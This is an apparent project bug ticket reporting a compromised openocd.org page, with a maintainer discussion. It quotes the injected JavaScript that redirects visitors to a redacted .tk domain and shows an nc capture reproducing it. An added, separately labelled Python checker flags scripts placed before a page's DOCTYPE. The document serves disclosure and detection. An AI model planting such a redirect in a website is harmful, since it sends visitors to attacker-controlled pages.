
#313 Website Compromised

0.10.0
closed
nobody
None
2021-08-04
2021-08-03
Sean Bruton
No

Looks like your website was compromised. Someone has injected the following into the HTML returned on /getting-openocd/

<script>window.location.replace("https://REDACTED_FOR_SECURITY.tk/help/?15131619432237");window.location.href = "https://REDACTED_FOR_SECURITY.tk/help/?15131619432237";</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

to reproduce:

$ echo -ne "GET /getting-openocd/ HTTP/1.1\nHost: openocd.org\n\n" | nc openocd.org 80 | head -n 20
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 Aug 2021 00:34:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Vary: Host
X-Pingback: http://openocd.org/web/xmlrpc.php
Set-Cookie: ht_rr=1; expires=Wed, 04-Aug-2021 00:34:44 GMT; path=/
Cache-Control: max-age=3600
Expires: Tue, 03 Aug 2021 01:34:42 GMT
X-From: sfp-web-3
Vary: Accept-Encoding

ce1
<script>window.location.replace("https://REDACTED_FOR_SECURITY.tk/help/?15131619432237");window.location.href = "https://REDACTED_FOR_SECURITY.tk/help/?15131619432237";</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head profile="http://gmpg.org/xfn/11">
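A defender-side check for the pattern shown in the capture above, as an added example that is not part of the original ticket or of the OpenOCD project: it decodes a chunked response like the one captured with `nc` and reports any script or redirect sent ahead of the page's DOCTYPE. The sample responses, the `build` helper and the `redirect.example` host are constructed for illustration.

```python
import re

DOCTYPE_RE = re.compile(rb"<!DOCTYPE\s+html", re.I)
REDIRECT_RE = re.compile(rb"window\.location(\s*=|\.href\s*=|\.replace\s*\()", re.I)

def dechunk(body: bytes) -> bytes:
    """Decode a chunked body; tolerates a capture cut short (e.g. by `head`)."""
    out, pos = b"", 0
    while True:
        eol = body.find(b"\n", pos)
        if eol == -1:
            return out
        try:
            size = int(body[pos:eol].split(b";")[0].strip().decode("ascii"), 16)
        except ValueError:
            return out              # not a chunk-size line: stop decoding
        if size == 0:
            return out              # terminating chunk
        out += body[eol + 1 : eol + 1 + size]
        pos = eol + 1 + size
        if body[pos : pos + 2] == b"\r\n":
            pos += 2                # CRLF that follows each chunk's data

def inspect_response(raw: bytes) -> dict:
    """Report what the server sent ahead of the page's DOCTYPE."""
    head, _, body = raw.partition(b"\r\n\r\n")
    if re.search(rb"(?im)^transfer-encoding:\s*chunked", head):
        body = dechunk(body)
    m = DOCTYPE_RE.search(body)
    # Limitation: a page with no DOCTYPE yields an empty prefix and no finding.
    prefix = body[: m.start()].strip() if m else b""
    return {
        "has_doctype": bool(m),
        "prefix_bytes": len(prefix),
        "script_before_doctype": b"<script" in prefix.lower(),
        "redirect_in_prefix": bool(REDIRECT_RE.search(prefix)),
    }

def build(body: bytes) -> bytes:
    """Constructed sample: wrap a body in a one-chunk HTTP/1.1 response."""
    return (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
            b"Transfer-Encoding: chunked\r\n\r\n"
            b"%x\r\n%s\r\n0\r\n\r\n" % (len(body), body))

CLEAN = b"<!DOCTYPE html>\n<html><head><title>ok</title></head><body></body></html>"
INJECTED = b'<script>window.location.replace("https://redirect.example/help/");</script>' + CLEAN

if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("injected", INJECTED)):
        print(name, inspect_response(build(page)))
```

Running the same check against the raw bytes of each published page on a schedule catches this kind of prepended redirect even when, as in this ticket, it disappears again before anyone looks.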

Discussion

  • Paul Fertser

    Paul Fertser - 2021-08-03

    Hello,

    On Tue, Aug 03, 2021 at 12:40:00AM -0000, sbruton@users.sourceforge.net wrote:

    > just opened ticket #313, looks like someone managed to compromise the
    > openocd.org website

    Thank you for reporting. I wonder if it's SF.net compromise because
    apparently it "resolved itself" and now the page is clean again?

    --
    Be free, use free (http://www.gnu.org/philosophy/free-sw.html) software!
    mailto:fercerpav@gmail.com

     
  • Paul Fertser

    Paul Fertser - 2021-08-04
    • status: new --> closed
     
  • Paul Fertser

    Paul Fertser - 2021-08-04

    Thank you! Should be fixed by migrating to Pelican now.

     
